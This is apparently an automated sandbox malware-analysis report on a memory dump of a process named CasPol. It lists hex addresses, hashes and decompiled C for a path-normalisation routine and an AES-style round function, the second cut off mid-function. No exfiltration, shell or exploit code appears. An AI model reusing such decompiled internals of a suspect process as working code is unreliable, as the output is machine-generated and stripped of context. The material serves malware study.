                                                                0x00000000
                                                                0x016fe1ae
                                                                0x016fe15d
                                                                0x016fe160
                                                                0x016fe163
                                                                0x016fe166
                                                                0x016fe166
                                                                0x016fe169
                                                                0x016fe169
                                                                0x016fe16e
                                                                0x00000000
                                                                0x00000000
                                                                0x016fe177
                                                                0x016fe17d
                                                                0x016fe17f
                                                                0x00000000
                                                                0x00000000
                                                                0x016fe18d
                                                                0x00000000
                                                                0x00000000
                                                                0x016fe18f
                                                                0x00000000
                                                                0x016fe18f
                                                                0x016fe179
                                                                0x016fe17b
                                                                0x00000000
                                                                0x016fe17b
                                                                0x016fe0f4
                                                                0x016fe082
                                                                0x016fe085
                                                                0x016fe0cd
                                                                0x016fe0d3
                                                                0x016fe0d5
                                                                0x00000000
                                                                0x016fe0d5
                                                                0x016fe087
                                                                0x016fe08a
                                                                0x016fe0c4
                                                                0x016fe0ca
                                                                0x016fe0cc
                                                                0x00000000
                                                                0x016fe0cc
                                                                0x016fe08c
                                                                0x016fe08f
                                                                0x016fe0bb
                                                                0x016fe0c1
                                                                0x016fe0c3
                                                                0x00000000
                                                                0x016fe0c3
                                                                0x016fe091
                                                                0x016fe094
                                                                0x016fe0b2
                                                                0x016fe0b8
                                                                0x016fe0ba
                                                                0x00000000
                                                                0x016fe0ba
                                                                0x016fe096
                                                                0x016fe099
                                                                0x016fe0a9
                                                                0x016fe0af
                                                                0x016fe0b1
                                                                0x00000000
                                                                0x016fe0b1
                                                                0x016fe09e
                                                                0x00000000
                                                                0x00000000
                                                                0x016fe0a6
                                                                0x016fe0a8
                                                                0x00000000
                                                                0x016fe0a8
                                                                0x016fe018
                                                                0x016fe01b
                                                                0x016fe01e
                                                                0x016fe023
                                                                0x016fe025
                                                                0x016fe062
                                                                0x016fe06a
                                                                0x016fe06e
                                                                0x016fe073
                                                                0x016fe075
                                                                0x016fe075
                                                                0x016fe07a
                                                                0x00000000
                                                                0x016fe07a

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b29cee2d2822ab3a78905d44582f76892212b92f5b1cd2a2a7ce1fce150456c7
                                                                • Instruction ID: c7560ddb2fe96ea32ac7dc43fec721d2a96387d7b1a9b9a25a4c0413393d0fd5
                                                                • Opcode Fuzzy Hash: b29cee2d2822ab3a78905d44582f76892212b92f5b1cd2a2a7ce1fce150456c7
                                                                • Instruction Fuzzy Hash: 57F1B372E002168BCB18CEA9CDD05BDFFF5EB49200B0A826DDA16EB395D735D941CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01644120 Relevance: .4, Instructions: 444COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 92%
                                                                			E01644120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x171d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0165F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E01646E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01644620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E01646E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M016445F8))) {
												case 0:
													_v568 = 0x1601078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x16011c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01644620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0166F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0166F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E016252A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0163EB70(1, 0x17179a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0163AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E016695D0();
																			L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0166B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01663D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0166B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                0x01644128
                                                                0x01644135
                                                                0x0164413c
                                                                0x01644141
                                                                0x01644145
                                                                0x01644147
                                                                0x0164414e
                                                                0x01644151
                                                                0x01644159
                                                                0x0164415c
                                                                0x01644160
                                                                0x01644164
                                                                0x01644168
                                                                0x0164416c
                                                                0x0164417f
                                                                0x01644181
                                                                0x0164446a
                                                                0x0164446a
                                                                0x0164418c
                                                                0x01644195
                                                                0x01644199
                                                                0x01644432
                                                                0x01644439
                                                                0x0164443d
                                                                0x01644442
                                                                0x01644447
                                                                0x00000000
                                                                0x0164419f
                                                                0x016441a3
                                                                0x016441b1
                                                                0x016441b9
                                                                0x016441bd
                                                                0x016445db
                                                                0x016445db
                                                                0x00000000
                                                                0x016441c3
                                                                0x016441c3
                                                                0x016441ce
                                                                0x016441d4
                                                                0x0168e138
                                                                0x0168e13e
                                                                0x0168e169
                                                                0x0168e16d
                                                                0x0168e19e
                                                                0x0168e16f
                                                                0x0168e16f
                                                                0x0168e175
                                                                0x0168e179
                                                                0x0168e18f
                                                                0x0168e193
                                                                0x00000000
                                                                0x0168e199
                                                                0x00000000
                                                                0x0168e199
                                                                0x0168e193
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016441da
                                                                0x016441da
                                                                0x016441df
                                                                0x016441e4
                                                                0x016441ec
                                                                0x01644203
                                                                0x01644207
                                                                0x0168e1fd
                                                                0x01644222
                                                                0x01644226
                                                                0x0168e1f3
                                                                0x0168e1f3
                                                                0x0164422c
                                                                0x0164422c
                                                                0x01644233
                                                                0x0168e1ed
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01644239
                                                                0x01644239
                                                                0x01644239
                                                                0x01644239
                                                                0x01644233
                                                                0x01644226
                                                                0x016441ee
                                                                0x016441ee
                                                                0x016441f4
                                                                0x01644575
                                                                0x0168e1b1
                                                                0x0168e1b1
                                                                0x00000000
                                                                0x0164457b
                                                                0x0164457b
                                                                0x01644582
                                                                0x0168e1ab
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01644588
                                                                0x01644588
                                                                0x0164458c
                                                                0x0168e1c4
                                                                0x0168e1c4
                                                                0x00000000
                                                                0x01644592
                                                                0x01644592
                                                                0x01644599
                                                                0x0168e1be
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0164459f
                                                                0x0164459f
                                                                0x016445a3
                                                                0x0168e1d7
                                                                0x0168e1e4
                                                                0x00000000
                                                                0x016445a9
                                                                0x016445a9
                                                                0x016445b0
                                                                0x0168e1d1
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016445b6
                                                                0x016445b6
                                                                0x016445b6
                                                                0x00000000
                                                                0x016445b6
                                                                0x016445b0
                                                                0x016445a3
                                                                0x01644599
                                                                0x0164458c
                                                                0x01644582
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016441f4
                                                                0x0164423e
                                                                0x01644241
                                                                0x016445c0
                                                                0x016445c4
                                                                0x00000000
                                                                0x016445ca
                                                                0x016445ca
                                                                0x00000000
                                                                0x0168e207
                                                                0x0168e20f
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016445d1
                                                                0x00000000
                                                                0x00000000
                                                                0x016445ca
                                                                0x00000000
                                                                0x01644247
                                                                0x01644247
                                                                0x01644247
                                                                0x01644249
                                                                0x01644249
                                                                0x01644249
                                                                0x01644251
                                                                0x01644251
                                                                0x01644257
                                                                0x0164425f
                                                                0x0164426e
                                                                0x01644270
                                                                0x0164427a
                                                                0x0168e219
                                                                0x0168e219
                                                                0x01644280
                                                                0x01644282
                                                                0x01644456
                                                                0x016445ea
                                                                0x00000000
                                                                0x016445f0
                                                                0x0168e223
                                                                0x00000000
                                                                0x0168e223
                                                                0x0164445c
                                                                0x0164445c
                                                                0x00000000
                                                                0x0164445c
                                                                0x00000000
                                                                0x01644288
                                                                0x0164428c
                                                                0x0168e298
                                                                0x01644292
                                                                0x01644292
                                                                0x0164429e
                                                                0x016442a3
                                                                0x016442a7
                                                                0x016442ac
                                                                0x0168e22d
                                                                0x016442b2
                                                                0x016442b2
                                                                0x016442b9
                                                                0x016442bc
                                                                0x016442c2
                                                                0x016442ca
                                                                0x016442cd
                                                                0x016442cd
                                                                0x016442d4
                                                                0x0164433f
                                                                0x0164433f
                                                                0x016442d6
                                                                0x016442d6
                                                                0x016442d9
                                                                0x016442dd
                                                                0x016442eb
                                                                0x0168e23a
                                                                0x016442f1
                                                                0x01644305
                                                                0x0164430d
                                                                0x01644315
                                                                0x01644318
                                                                0x0164431f
                                                                0x01644322
                                                                0x0164432e
                                                                0x0164433b
                                                                0x0164433b
                                                                0x00000000
                                                                0x0164432e
                                                                0x016442eb
                                                                0x0164434c
                                                                0x0164434e
                                                                0x01644352
                                                                0x01644359
                                                                0x0164435e
                                                                0x01644361
                                                                0x0164436e
                                                                0x0164438a
                                                                0x0164438e
                                                                0x01644396
                                                                0x0164439e
                                                                0x016443a1
                                                                0x016443ad
                                                                0x016443bb
                                                                0x016443bb
                                                                0x016443ad
                                                                0x0164436e
                                                                0x016443bf
                                                                0x016443c5
                                                                0x01644463
                                                                0x01644463
                                                                0x016443ce
                                                                0x016443d5
                                                                0x016443d9
                                                                0x016443df
                                                                0x01644475
                                                                0x01644479
                                                                0x01644491
                                                                0x01644491
                                                                0x01644479
                                                                0x016443e5
                                                                0x016443eb
                                                                0x016443f4
                                                                0x016443f6
                                                                0x016443f9
                                                                0x016443fc
                                                                0x016443ff
                                                                0x016444e8
                                                                0x016444ed
                                                                0x016444f3
                                                                0x0168e247
                                                                0x00000000
                                                                0x016444f9
                                                                0x01644504
                                                                0x01644508
                                                                0x0164450f
                                                                0x0168e269
                                                                0x00000000
                                                                0x01644515
                                                                0x01644519
                                                                0x01644531
                                                                0x01644534
                                                                0x01644537
                                                                0x0164453e
                                                                0x01644541
                                                                0x0164454a
                                                                0x0168e255
                                                                0x0168e255
                                                                0x0168e25b
                                                                0x0168e25e
                                                                0x0168e261
                                                                0x0168e261
                                                                0x01644555
                                                                0x01644559
                                                                0x0164455d
                                                                0x0168e26d
                                                                0x0168e270
                                                                0x0168e274
                                                                0x0168e27a
                                                                0x0168e27d
                                                                0x0168e28e
                                                                0x0168e28e
                                                                0x01644563
                                                                0x01644563
                                                                0x01644569
                                                                0x01644569
                                                                0x00000000
                                                                0x0164455d
                                                                0x0164450f
                                                                0x00000000
                                                                0x016444f3
                                                                0x016443ff
                                                                0x01644405
                                                                0x01644405
                                                                0x01644405
                                                                0x016442ac
                                                                0x0164428c
                                                                0x01644282
                                                                0x01644407
                                                                0x0164440d
                                                                0x0168e2af
                                                                0x0168e2af
                                                                0x01644413
                                                                0x01644413
                                                                0x00000000
                                                                0x016441d4
                                                                0x00000000
                                                                0x016441c3
                                                                0x016441bd
                                                                0x01644415
                                                                0x01644415
                                                                0x01644416
                                                                0x01644417
                                                                0x01644429
                                                                0x0164416e
                                                                0x0164416e
                                                                0x01644175
                                                                0x01644498
                                                                0x0164449f
                                                                0x0168e12d
                                                                0x00000000
                                                                0x0168e133
                                                                0x00000000
                                                                0x0168e133
                                                                0x016444a5
                                                                0x016444a5
                                                                0x016444aa
                                                                0x00000000
                                                                0x016444bb
                                                                0x016444ca
                                                                0x016444d6
                                                                0x016444d7
                                                                0x016444d8
                                                                0x016444e3
                                                                0x016444e3
                                                                0x016444aa
                                                                0x0164417b
                                                                0x0164417b
                                                                0x0164417b
                                                                0x00000000
                                                                0x0164417b
                                                                0x01644175
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dd1195d881ceccfe6c2515aa8f17b3b759581917388a3b8a44e62192f9eec64b
                                                                • Instruction ID: 5f90dc378780ce26ca876332af912a2b20dc6ba2bb9cde9b5169c1eb9d742bfa
                                                                • Opcode Fuzzy Hash: dd1195d881ceccfe6c2515aa8f17b3b759581917388a3b8a44e62192f9eec64b
                                                                • Instruction Fuzzy Hash: F6F17C706082118BD724DF19C891B7AB7E1FF99714F04892EF986CB750EB35D881CB52
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004057D3 Relevance: .4, Instructions: 435COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 25%
                                                                			E004057D3(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t283;
				signed int* _t359;
				signed int _t385;
				signed int* _t411;
				signed int _t431;
				signed int _t460;
				signed int _t480;
				signed int _t562;
				signed int _t606;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t460 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t460;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t283 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t283;
				_t431 =  *(__eax + 4 + (_t283 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t460 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t606 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t283 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t460 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t460 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t411 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t411 - 4);
				_t480 = (_a4 >> 1) - 1;
				_a4 = _t480;
				if(_t480 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t606 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t431 >> 0x00000018 & 0x000000ff) * 4) ^  *_t411;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t431 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t606 >> 0x00000018 & 0x000000ff) * 4) ^ _t411[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t385 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t431 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t606 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t411[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t385;
						_t562 =  *(__eax + 4 + (_t606 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t431 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t411[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t431 =  *(__eax + 4 + (_t385 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t562 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t411[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t606 =  *(__eax + 4 + (_t562 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t385 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t411[5];
						_v12 = _t562;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t562 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t411[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t411 =  &(_t411[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t411 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
